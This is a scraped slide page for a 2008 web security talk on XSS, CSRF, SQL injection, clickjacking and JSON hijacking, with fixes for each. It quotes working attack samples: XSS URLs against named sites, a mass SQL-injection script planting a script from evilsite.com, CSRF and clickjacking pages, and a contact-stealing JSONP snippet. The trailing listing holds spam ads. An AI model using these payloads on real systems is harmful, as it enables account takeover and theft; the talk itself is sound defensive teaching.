Web Security Horror Stories
The Director's Cut

Simon Willison, 26th October 2008
The edited version
• On Friday, I spent 15 minutes introducing:
 • XSS
 • CSRF / login CSRF
 • SQL injection
 • Clickjacking
• I promised this talk would provide fixes
XSS

• Cross-site scripting
 • Attacker injects JavaScript code into your site
• Amazingly common
• A single XSS hole on your domain compromises your security, entirely
Alex Russell:

    If you are subject to an XSS, the same domain policy already ensures that you're f'd. An XSS attack is the "root" or "ring 0" attack of the web.

http://www.sitepen.com/blog/2007/01/07/when-vendors-attack-film-at-11/
The same origin policy
    "The same origin policy prevents a document or script loaded from one origin from getting or setting properties of a document from another origin. This policy dates all the way back to Netscape Navigator 2.0."

https://developer.mozilla.org/en/Same_origin_policy_for_JavaScript
Why?
• Without the same origin policy, I could load your site in a frame, iframe or popup window from my site...
 • ... and steal data from it
 • ... or rewrite it with my own modifications
• evil.hax.ru should not be able to read secret-wiki.bigco.intl
• XMLHttpRequest has the same policy
Things I can do if you have an XSS hole
• Steal your users' cookies and log in as them
• Show a fake phishing login page on your site
• Embed malware and drive-by downloads
• Perform any action as if I was your user
Two categories of XSS
• Reflected
 • I embed my JS in a link to your site and trick your user into following it
• Persistent
 • I get my XSS into your site's database somehow so that it shows up on your pages
http://www.facebook.com/srch.php?nm=xss%00<script>alert('XSS')</script>

http://www.youtube.com/edit_playlist_info?p='%22%3E%3Cscript%20src=http://ckers.org/s%3E

http://groups.google.com/group/rec.sport.pro-wrestling/browse_thread/thread/1ab38554971acfc9')&+eval(alert(document.cookie))&+eval('?tvc=2

http://search.live.com/images/results.aspx?q=1&first=21&FORM=PEIR"><script>alert('securitylab.ru')</script>

All from http://xssed.com/
SQL injection
Inexcusable.
Use parameterised queries, or an ORM
If you're gluing SQL strings together with string appends,
• Wrong:
 • $sql = "select * from users where username = '" . $username . "'";

• Right:
 • $results = db_query("select * from users where username = ?", $username);
Mass XSS via SQL injection
DECLARE @T varchar(255), @C varchar(255);
DECLARE Table_Cursor CURSOR FOR
SELECT a.name, b.name
FROM sysobjects a, syscolumns b
WHERE a.id = b.id AND a.xtype = 'u' AND
  (b.xtype = 99 OR b.xtype = 35 OR b.xtype = 231 OR b.xtype = 167);
OPEN Table_Cursor;
FETCH NEXT FROM Table_Cursor INTO @T, @C;
WHILE (@@FETCH_STATUS = 0) BEGIN
  EXEC(
     'update [' + @T + '] set [' + @C + '] =
         rtrim(convert(varchar,[' + @C + ']))+
         ''<script src=http://evilsite.com/1.js></script>'''
  );
  FETCH NEXT FROM Table_Cursor INTO @T, @C;
END;
CLOSE Table_Cursor;
DEALLOCATE Table_Cursor;

                     http://hackademix.net/2008/04/26/mass-attack-faq/
Preventing XSS
• Use a tool that escapes everything on output
• Only unescape stuff that you know is safe and you know contains markup you want to execute
• IE 8 has an XSS filter; this is irrelevant to developers
• httpOnly cookies are mostly a waste of time
HTML "sanitisation"
• My users need to be able to add links and basic styles to their submissions
• "I'll let them use HTML and remove anything nasty"
• An extremely common vector for XSS
 • MySpace
 • LiveJournal
 • Almost anyone else who tries
samy is my hero
  http://namb.la/popular/
A social network worm

• XSS hole in MySpace's HTML filter
• When you viewed Samy's profile...
 • JS makes you add him as a friend
 • JS uses XMLHttpRequest to add his exploit to YOUR profile as well
20 hours, 1,005,831 friend requests (then MySpace crashed)
<div id=mycode style="BACKGROUND: url('java
script:eval(document.all.mycode.expr)')" expr="...">

eval('document.body.inne' + 'rHTML');

eval('xmlhttp.onread' + 'ystatechange = callback');

http://namb.la/popular/tech.html
Things to remember
• Whitelist, don't blacklist
• You're programming against undocumented parsing routines in closed-source browsers
• Distrust any library that doesn't have a unit test suite a mile long
• http://ha.ckers.org/xss.html
• http://code.google.com/p/html5lib/ is promising
Google's UTF-7 hole
The UTF-7 hole
• Google's 404 pages used to be served without a character set specified in the HTTP headers or <head> section
• Without those hints, IE inspects the first 4096 bytes to "guess" which encoding is used
• XSS attacks encoded as UTF-7 were shown on the page and executed by IE

http://shiflett.org/blog/2005/dec/googles-xss-vulnerability
You can't trust CSS either
• Want to let your users include their own stylesheet?
• HTC in IE and XBL in Mozilla are both vectors for JavaScript attacks
 • LiveJournal were attacked with this
• A "position: absolute" hack was used to steal 30,000 MySpace passwords last year

http://community.livejournal.com/lj_dev/708069.html
http://www.securiteam.com/securitynews/6O00M0AHFW.html
CSRF
Bill Zeller:

"We've found CSRF vulnerabilities in sites that have a huge incentive to do security correctly. If you're in charge of a website and haven't specifically protected against CSRF, chances are you're vulnerable"
The Google Web Accelerator
How does it work?

• It pre-fetches the links on a page into a cache, so they're already loaded when you click on them

• Links like http://app.example.com/delete.php?id=5
http://www.37signals.com/svn/archives2/google_web_accelerator_hey_not_so_fast_an_alert_for_web_app_designers.php
That's also a security hole
<img src="http://app.example.com/delete.php?id=1">
<img src="http://app.example.com/delete.php?id=2">
<img src="http://app.example.com/delete.php?id=3">
<img src="http://app.example.com/delete.php?id=4">
<img src="http://app.example.com/delete.php?id=5">
<img src="http://app.example.com/delete.php?id=6">
<img src="http://app.example.com/delete.php?id=7">
<img src="http://app.example.com/delete.php?id=8">
...
So use POST

• You can't create a page that automatically posts to another site, can you?
POST will not save you
<form action="http://app.example.com/delete.php" method="POST">
 <input type="hidden" name="id" value="1">
 <input type="submit" value="More kittens please!">
</form>

fofurasfelinas: http://www.flickr.com/photos/fofurasfelinas/9724483/
Or do it with JavaScript
<div style="display: none">
<form action="http://app.example.com/delete.php" method="POST">
 <input type="hidden" name="id" value="1">
</form>
</div>

<script>document.forms[0].submit()</script>

Put this in a hidden iframe and your victim won't even know it happened.
The Digg exploit

• A few years ago, Digg had no CSRF protection on their "digg this" button
• Self-digging pages!

http://ha.ckers.org/blog/20060615/a-story-that-diggs-itself/
The Gmail filter hack
http://www.gnucitizen.org/blog/google-gmail-e-mail-hijack-technique/
"We believe this is the first CSRF vulnerability to allow the transfer of funds from a financial institution."

http://www.freedom-to-tinker.com/blog/wzeller/popular-websites-vulnerable-cross-site-request-forgery-attacks
Preventing CSRF
• You need to distinguish between form interactions from your user on your site, and form interactions from your user on some other site
• Referrer checking is notoriously unreliable
• Solution: include a form token (Yahoo! calls this a "crumb") proving that the post came from your site
Crumbs
<form action="http://app.example.com/delete.php" method="POST">
 <input type="hidden" name="id" value="37">
 <input type="hidden" name="crumb" value="856c2f50ddc49fd710f14a406ec1fef652d3c9f">
 <input type="submit" value="Delete this item">
</form>
Crumbs
• Should be unique per user (or one user can use their crumb to attack another)
• Hence should be tied to the user's session or login cookie
• Should be changed over time
• Quick and dirty: use sha1(salt + user's session ID + timestamp) as the crumb
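An added example (not from the talk) of a crumb that follows the recipe on this slide: tied to the session, stamped with the time it was issued, and expiring after a fixed lifetime. It uses a keyed HMAC-SHA256 in place of the slide's salted sha1; SECRET_KEY, CRUMB_LIFETIME and the toy handle_delete handler are assumptions for illustration.

```python
import hashlib
import hmac
import time

# Server-side secret; constructed placeholder for this example only.
# A real application loads it from configuration and never hard-codes it.
SECRET_KEY = b"example-only-replace-with-a-long-random-secret"
CRUMB_LIFETIME = 3600  # seconds a crumb stays valid before the form needs a fresh one


def _mac(session_id, ts):
    """Keyed hash over session ID and issue time. The slide's quick-and-dirty
    recipe is sha1(salt + session ID + timestamp); HMAC is the keyed equivalent."""
    msg = "{}:{}".format(session_id, ts).encode()
    return hmac.new(SECRET_KEY, msg, hashlib.sha256).hexdigest()


def make_crumb(session_id, now=None):
    """Crumb to embed in the hidden form field, as '<timestamp>:<mac>'.
    The timestamp travels with the crumb so the server can check its age."""
    ts = int(time.time()) if now is None else int(now)
    return "{}:{}".format(ts, _mac(session_id, ts))


def check_crumb(crumb, session_id, now=None):
    """True only if the crumb was minted for this session and has not expired."""
    current = int(time.time()) if now is None else int(now)
    ts_str, sep, mac = crumb.partition(":")
    if not sep or not ts_str.isdigit():
        return False
    ts = int(ts_str)
    if ts > current or current - ts > CRUMB_LIFETIME:
        return False
    # Constant-time comparison so timing differences leak nothing about the MAC.
    return hmac.compare_digest(mac, _mac(session_id, ts))


def handle_delete(form, cookies, now=None):
    """Toy stand-in for delete.php: the session cookie says who the user is,
    the crumb proves this site served the form to that user. A forged request
    from another site carries the cookie but cannot know the crumb."""
    session_id = cookies.get("session")
    if not session_id:
        return "401 not logged in"
    if not check_crumb(form.get("crumb", ""), session_id, now):
        return "403 missing or invalid crumb"
    return "deleted item {}".format(form.get("id"))
```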
Protecting the crumb
• Your crumb is now the only thing protecting you from CSRF attacks
• This is why XSS is "ring 0" for the Web
• With XSS, I can steal your crumb and run riot across your site
• XSS holes are automatically CSRF holes
Crumbs and Ajax
• Ajax can set HTTP headers; regular forms can't
• Ajax requests must be from the same domain
• So X-Requested-By: XMLHttpRequest can only come from your own site
• You can skip your crumb checking for requests that include that custom header
Login CSRF
• Most login forms skip CSRF protection
 • Create a throw-away PayPal account
 • Use CSRF to log someone in as "you"
 • Hope that they add their credit card or bank details
 • Log in later and steal all of their money!
Clickjacking

http://jeremiahgrossman.blogspot.com/2008/09/cancelled-clickjacking-owasp-appsec.html
[diagram: iframe]
<style type="text/css">
iframe {
  width: 400px;
  height: 200px;
  position: absolute;
  top: 10px;
  left: 10px;
  overflow: hidden;
  opacity: 0;
}
#decoy {
   ...
}
</style>

<iframe src="http://veryimportantapp.com/delete-account/">
</iframe>

<p id="decoy">Click HERE for kittens!</p>
Frame-busting
<script type="text/javascript">
if (top.location != location) {
  top.location.href = document.location.href;
}
</script>

• Ironically, turning off JavaScript in your browser makes you less safe here
Anti click-jacking
The problem with plugins
crossdomain.xml
<cross-domain-policy>
  <allow-access-from domain="*" />
</cross-domain-policy>

Putting this at example.com/crossdomain.xml allows Flash applets on other sites to read your pages and steal your crumbs

Flash can even fake an X-Requested-With: XMLHttpRequest header

That's why Flickr use api.flickr.com/crossdomain.xml instead
Nasty crossdomain.xml tricks
loadPolicyFile("http://dom.ext/exit.php?url=http://dom.ext/upl/Xdomain.xml")

00000000   47   49   46   38   39   61   01   01-01   01   e7   e9   20   3c   63   72   GIF89a.......<cr
00000010   6f   73   73   2d   64   6f   6d   61-69   6e   2d   70   6f   6c   69   63   oss-domain-polic
00000020   79   3e   0a   20   20   3c   61   6c-6c   6f   77   2d   61   63   63   65   y>...<allow-acce
00000030   73   73   2d   66   72   6f   6d   20-64   6f   6d   61   69   6e   3d   22   ss-from domain="
00000040   2a   22   2f   3e   20   0a   20   20-3c   2f   63   72   6f   73   73   2d   *"/>....</cross-
00000050   64   6f   6d   61   69   6e   2d   70-6f   6c   69   63   79   3e   47   49   domain-policy>..

http://www.hardened-php.net/library/poking_new_holes_with_flash_crossdomain_policy_files.html
The PDF hole

• In January 2007, an XSS hole was found in the Adobe PDF reader itself
• It could execute JavaScript in the context of the current domain
• Any sites hosting .pdf files for download were vulnerable

http://shiflett.org/blog/2007/jan/adobe-pdf-xss-vulnerability
You can't secure your site 100%, because there's always a chance a browser or plugin will screw things up for you
Insecure JSON
JSONP rocks!
• http://json-tinyurl.appspot.com/
• http://json-time.appspot.com/
• http://json-head.appspot.com/

http://json-tinyurl.appspot.com/?url=http://example.com/&callback=foo

foo({"tinyurl": "http://tinyurl.com/kotu", "ok": true})
• JSONP lets you opt-in to sharing your site's data with other sites using JavaScript

• ... so make sure it's data you want to share
Stealing Google contacts
<script>
function google(a){
  var emails;
  for(i=1;i<a.Body.Contacts.length;i){
    alert(a.Body.Contacts[i].Email);
  }
  emails = "</ol>"
  document.write(emails);
}
</script>
<script src="http://docs.google.com/data/contacts?out=js&show=ALL&psort=Affinity&callback=google&max=99999">
</script>

http://blog.adamjacobmuller.com/gmail.txt
http://www.cyber-knowledge.net/blog/2007/01/01/gmail-vulnerable-to-contact-list-hijacking/
Jeremiah Grossman:

"If any JSON feed containing user-sensitive information is wrapped with a call-back and has a predictable URL... then that data is at risk"

http://jeremiahgrossman.blogspot.com/2007/01/gmail-xsrf-json-call-back-hackery.html
Regular JSON?
• That's not secure either
• In old versions of Firefox, you can redefine the Array constructor to grab the data
• If your JSON object is an array, the data can be grabbed using <script src="your-data-here">

http://directwebremoting.org/blog/joe/2007/03/05/json_is_not_as_safe_as_people_think_it_is.html
Secure JSON
Use { } as the root, not [ ]

If you're paranoid about future similar problems, use an idiom like this one:

while (true) {
  {"json": "goes here"}
}
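An added example (not from the talk) of both halves of the idiom on this slide: the server refuses an array root and wraps the object in the infinite loop, and the same-origin client strips the wrapper before parsing. Function names and the PREFIX/SUFFIX constants are assumptions for illustration.

```python
import json

# The wrapper from the slide. A <script src=...> include on another site
# executes this text and spins forever, so a redefined Array constructor
# never receives the data; a same-origin XMLHttpRequest reads the raw text
# and removes the wrapper before handing it to the JSON parser.
PREFIX = "while (true) {\n"
SUFFIX = "\n}"


def secure_json_response(data):
    """Serialise data for same-origin consumers only.
    Refuses anything but an object at the root (the array-root leak the
    previous slide describes), then applies the loop wrapper."""
    if not isinstance(data, dict):
        raise ValueError("JSON root must be an object, not an array or scalar")
    return PREFIX + json.dumps(data) + SUFFIX


def parse_secure_json(body):
    """Client side: insist on the wrapper, then parse only what is inside it.
    Rejecting unwrapped bodies catches a server that silently lost the idiom."""
    if not (body.startswith(PREFIX) and body.endswith(SUFFIX)):
        raise ValueError("response is missing the anti-hijack wrapper")
    return json.loads(body[len(PREFIX):-len(SUFFIX)])
```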
And if that wasn't enough
"More than 70% of people would reveal their computer password in exchange for a bar of chocolate, a survey has found."

http://news.bbc.co.uk/1/hi/technology/3639679.stm

• We have a shared responsibility to teach people better online security behaviour
• Don't teach our users to be phished!
NoScript?
Stay informed!
• http://planet-websecurity.org/feed/
• http://www.owasp.org/
• http://simonwillison.net/tags/security/
• http://simonwillison.net/tags/csrf/
• http://simonwillison.net/tags/xss/
• http://simonwillison.net/tags/clickjacking/
• http://simonwillison.net/tags/phishing/
Thank you


PHPUG Presentation
PHPUG PresentationPHPUG Presentation
PHPUG Presentation
Ā 
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRFBe Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Be Afraid. Be Very Afraid. Javascript security, XSS & CSRF
Ā 
JavaScript Security
JavaScript SecurityJavaScript Security
JavaScript Security
Ā 
W3 conf hill-html5-security-realities
W3 conf hill-html5-security-realitiesW3 conf hill-html5-security-realities
W3 conf hill-html5-security-realities
Ā 
Whatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the processWhatever it takes - Fixing SQLIA and XSS in the process
Whatever it takes - Fixing SQLIA and XSS in the process
Ā 
2009 Barcamp Nashville Web Security 101
2009 Barcamp Nashville   Web Security 1012009 Barcamp Nashville   Web Security 101
2009 Barcamp Nashville Web Security 101
Ā 
Securing Java EE Web Apps
Securing Java EE Web AppsSecuring Java EE Web Apps
Securing Java EE Web Apps
Ā 
Reverse Engineering Malicious Javascript
Reverse Engineering Malicious JavascriptReverse Engineering Malicious Javascript
Reverse Engineering Malicious Javascript
Ā 
PHP Secure Programming
PHP Secure ProgrammingPHP Secure Programming
PHP Secure Programming
Ā 
Integrity protection for third-party JavaScript
Integrity protection for third-party JavaScriptIntegrity protection for third-party JavaScript
Integrity protection for third-party JavaScript
Ā 
Web Security
Web SecurityWeb Security
Web Security
Ā 
Ajax Security
Ajax SecurityAjax Security
Ajax Security
Ā 
Brakeman
BrakemanBrakeman
Brakeman
Ā 
XSS - Attacks & Defense
XSS - Attacks & DefenseXSS - Attacks & Defense
XSS - Attacks & Defense
Ā 
Intro to Php Security
Intro to Php SecurityIntro to Php Security
Intro to Php Security
Ā 
2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA2 Roads to Redemption - Thoughts on XSS and SQLIA
2 Roads to Redemption - Thoughts on XSS and SQLIA
Ā 
Hacking - Web based attacks
Hacking - Web based attacksHacking - Web based attacks
Hacking - Web based attacks
Ā 
Web Security 101
Web Security 101Web Security 101
Web Security 101
Ā 
Avoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might thinkAvoiding Cross Site Scripting - Not as easy as you might think
Avoiding Cross Site Scripting - Not as easy as you might think
Ā 
Meteor Meets Mallory
Meteor Meets MalloryMeteor Meets Mallory
Meteor Meets Mallory
Ā 

More from Simon Willison

How Lanyrd does Geo
How Lanyrd does GeoHow Lanyrd does Geo
How Lanyrd does GeoSimon Willison
Ā 
Cheap tricks for startups
Cheap tricks for startupsCheap tricks for startups
Cheap tricks for startupsSimon Willison
Ā 
The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)Simon Willison
Ā 
How we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graphHow we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graphSimon Willison
Ā 
Web Services for Fun and Profit
Web Services for Fun and ProfitWeb Services for Fun and Profit
Web Services for Fun and ProfitSimon Willison
Ā 
Tricks & challenges developing a large Django application
Tricks & challenges developing a large Django applicationTricks & challenges developing a large Django application
Tricks & challenges developing a large Django applicationSimon Willison
Ā 
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & FabricAdvanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & FabricSimon Willison
Ā 
How Lanyrd uses Twitter
How Lanyrd uses TwitterHow Lanyrd uses Twitter
How Lanyrd uses TwitterSimon Willison
Ā 
Building Things Fast - and getting approval
Building Things Fast - and getting approvalBuilding Things Fast - and getting approval
Building Things Fast - and getting approvalSimon Willison
Ā 
Rediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesRediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesSimon Willison
Ā 
Building crowdsourcing applications
Building crowdsourcing applicationsBuilding crowdsourcing applications
Building crowdsourcing applicationsSimon Willison
Ā 
Evented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunniesEvented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunniesSimon Willison
Ā 
Cowboy development with Django
Cowboy development with DjangoCowboy development with Django
Cowboy development with DjangoSimon Willison
Ā 
Crowdsourcing with Django
Crowdsourcing with DjangoCrowdsourcing with Django
Crowdsourcing with DjangoSimon Willison
Ā 
Class-based views with Django
Class-based views with DjangoClass-based views with Django
Class-based views with DjangoSimon Willison
Ā 
Web App Security Horror Stories
Web App Security Horror StoriesWeb App Security Horror Stories
Web App Security Horror StoriesSimon Willison
Ā 
When Zeppelins Ruled The Earth
When Zeppelins Ruled The EarthWhen Zeppelins Ruled The Earth
When Zeppelins Ruled The EarthSimon Willison
Ā 

More from Simon Willison (20)

How Lanyrd does Geo
How Lanyrd does GeoHow Lanyrd does Geo
How Lanyrd does Geo
Ā 
Cheap tricks for startups
Cheap tricks for startupsCheap tricks for startups
Cheap tricks for startups
Ā 
The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)The Django Web Framework (EuroPython 2006)
The Django Web Framework (EuroPython 2006)
Ā 
Building Lanyrd
Building LanyrdBuilding Lanyrd
Building Lanyrd
Ā 
How we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graphHow we bootstrapped Lanyrd using Twitter's social graph
How we bootstrapped Lanyrd using Twitter's social graph
Ā 
Web Services for Fun and Profit
Web Services for Fun and ProfitWeb Services for Fun and Profit
Web Services for Fun and Profit
Ā 
Tricks & challenges developing a large Django application
Tricks & challenges developing a large Django applicationTricks & challenges developing a large Django application
Tricks & challenges developing a large Django application
Ā 
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & FabricAdvanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Advanced Aspects of the Django Ecosystem: Haystack, Celery & Fabric
Ā 
How Lanyrd uses Twitter
How Lanyrd uses TwitterHow Lanyrd uses Twitter
How Lanyrd uses Twitter
Ā 
ScaleFail
ScaleFailScaleFail
ScaleFail
Ā 
Building Things Fast - and getting approval
Building Things Fast - and getting approvalBuilding Things Fast - and getting approval
Building Things Fast - and getting approval
Ā 
Rediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The LibrariesRediscovering JavaScript: The Language Behind The Libraries
Rediscovering JavaScript: The Language Behind The Libraries
Ā 
Building crowdsourcing applications
Building crowdsourcing applicationsBuilding crowdsourcing applications
Building crowdsourcing applications
Ā 
Evented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunniesEvented I/O based web servers, explained using bunnies
Evented I/O based web servers, explained using bunnies
Ā 
Cowboy development with Django
Cowboy development with DjangoCowboy development with Django
Cowboy development with Django
Ā 
Crowdsourcing with Django
Crowdsourcing with DjangoCrowdsourcing with Django
Crowdsourcing with Django
Ā 
Django Heresies
Django HeresiesDjango Heresies
Django Heresies
Ā 
Class-based views with Django
Class-based views with DjangoClass-based views with Django
Class-based views with Django
Ā 
Web App Security Horror Stories
Web App Security Horror StoriesWeb App Security Horror Stories
Web App Security Horror Stories
Ā 
When Zeppelins Ruled The Earth
When Zeppelins Ruled The EarthWhen Zeppelins Ruled The Earth
When Zeppelins Ruled The Earth
Ā 

Recently uploaded

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Servicegiselly40
Ā 
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | DelhiFULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhisoniya singh
Ā 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonetsnaman860154
Ā 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxOnBoard
Ā 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j
Ā 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitecturePixlogix Infotech
Ā 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxMalak Abu Hammad
Ā 
Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024The Digital Insurer
Ā 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGSujit Pal
Ā 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerThousandEyes
Ā 
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024BookNet Canada
Ā 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024Scott Keck-Warren
Ā 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Paola De la Torre
Ā 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Allon Mureinik
Ā 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024Results
Ā 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slidespraypatel2
Ā 
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure servicePooja Nehwal
Ā 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesSinan KOZAK
Ā 
GenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationGenCyber Cyber Security Day Presentation
GenCyber Cyber Security Day PresentationMichael W. Hawkins
Ā 
My Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationMy Hashitalk Indonesia April 2024 Presentation
My Hashitalk Indonesia April 2024 PresentationRidwan Fadjar
Ā 

Recently uploaded (20)

CNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of ServiceCNv6 Instructor Chapter 6 Quality of Service
CNv6 Instructor Chapter 6 Quality of Service
Ā 
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | DelhiFULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
FULL ENJOY šŸ” 8264348440 šŸ” Call Girls in Diplomatic Enclave | Delhi
Ā 
How to convert PDF to text with Nanonets
How to convert PDF to text with NanonetsHow to convert PDF to text with Nanonets
How to convert PDF to text with Nanonets
Ā 
Maximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptxMaximizing Board Effectiveness 2024 Webinar.pptx
Maximizing Board Effectiveness 2024 Webinar.pptx
Ā 
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Neo4j - How KGs are shaping the future of Generative AI at AWS Summit London ...
Ā 
Understanding the Laravel MVC Architecture
Understanding the Laravel MVC ArchitectureUnderstanding the Laravel MVC Architecture
Understanding the Laravel MVC Architecture
Ā 
The Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptxThe Codex of Business Writing Software for Real-World Solutions 2.pptx
The Codex of Business Writing Software for Real-World Solutions 2.pptx
Ā 
Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024Finology Group ā€“ Insurtech Innovation Award 2024
Finology Group ā€“ Insurtech Innovation Award 2024
Ā 
Google AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAGGoogle AI Hackathon: LLM based Evaluator for RAG
Google AI Hackathon: LLM based Evaluator for RAG
Ā 
How to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected WorkerHow to Troubleshoot Apps for the Modern Connected Worker
How to Troubleshoot Apps for the Modern Connected Worker
Ā 
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
#StandardsGoals for 2024: Whatā€™s new for BISAC - Tech Forum 2024
Ā 
SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024SQL Database Design For Developers at php[tek] 2024
SQL Database Design For Developers at php[tek] 2024
Ā 
Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101Salesforce Community Group Quito, Salesforce 101
Salesforce Community Group Quito, Salesforce 101
Ā 
Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)Injustice - Developers Among Us (SciFiDevCon 2024)
Injustice - Developers Among Us (SciFiDevCon 2024)
Ā 
A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024A Call to Action for Generative AI in 2024
A Call to Action for Generative AI in 2024
Ā 
Slack Application Development 101 Slides
Slack Application Development 101 SlidesSlack Application Development 101 Slides
Slack Application Development 101 Slides
Ā 
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure serviceWhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
WhatsApp 9892124323 āœ“Call Girls In Kalyan ( Mumbai ) secure service
Ā 
Unblocking The Main Thread Solving ANRs and Frozen Frames
Unblocking The Main Thread Solving ANRs and Frozen FramesUnblocking The Main Thread Solving ANRs and Frozen Frames
